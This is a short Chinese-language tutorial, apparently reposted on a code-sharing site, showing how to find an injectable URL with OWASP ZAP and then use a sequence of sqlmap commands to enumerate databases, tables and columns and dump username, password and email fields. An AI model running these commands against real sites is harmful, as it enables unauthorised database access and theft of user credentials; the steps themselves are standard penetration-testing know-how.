一次sqlmap注入某注入點並且dump出賬號密碼全程


利用OWASP ZAP 安全掃描工具掃描可能存在注入的url

 

判斷注入點:sqlmap.py -u “存在注入url”

爆出所有數據庫名字:sqlmap.py -u “存在注入url” --dbs

查看當前使用賬號:sqlmap.py -u “存在注入url” --current-user

//打**的是關鍵看我下面的四步走

1、**查看當前數據庫:sqlmap.py -u “存在注入url” --current-db

2、**列出數據庫中所有表:sqlmap.py -u “存在注入url” --tables,除了這樣也可以這樣整,如下所示:sqlmap.py -u “存在注入url” -D “當前數據庫名” --tables   //解釋說明:-D是指定數據庫名稱。

3、**-T是指定列要出字段的表,就是數據庫中的表名。

列出數據庫中的表中的字段:sqlmap.py -u “存在注入url” -D “當前數據庫名” -T “數據庫中的隨意一張表(選取表需要自己判斷)” --columns。

4、**跑出來表中的字段然后暴力拆解賬號和密碼,一般字段賬號密碼都是user/pass/password/username/keyword這些等等,自己找敏感的字段然后進行拆解。

-C指定要暴力拆解的字段

暴力拆解賬號密碼:sqlmap.py -u “存在注入url ” -D “當前數據庫名” -T “數據庫中的隨意一張表(選取表需要自己判斷)” -C “username,password,email(columns(字段)中疑似網站賬號密碼郵箱等敏感字段,舉例子說明)” --dump

 --dump將結果導出。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM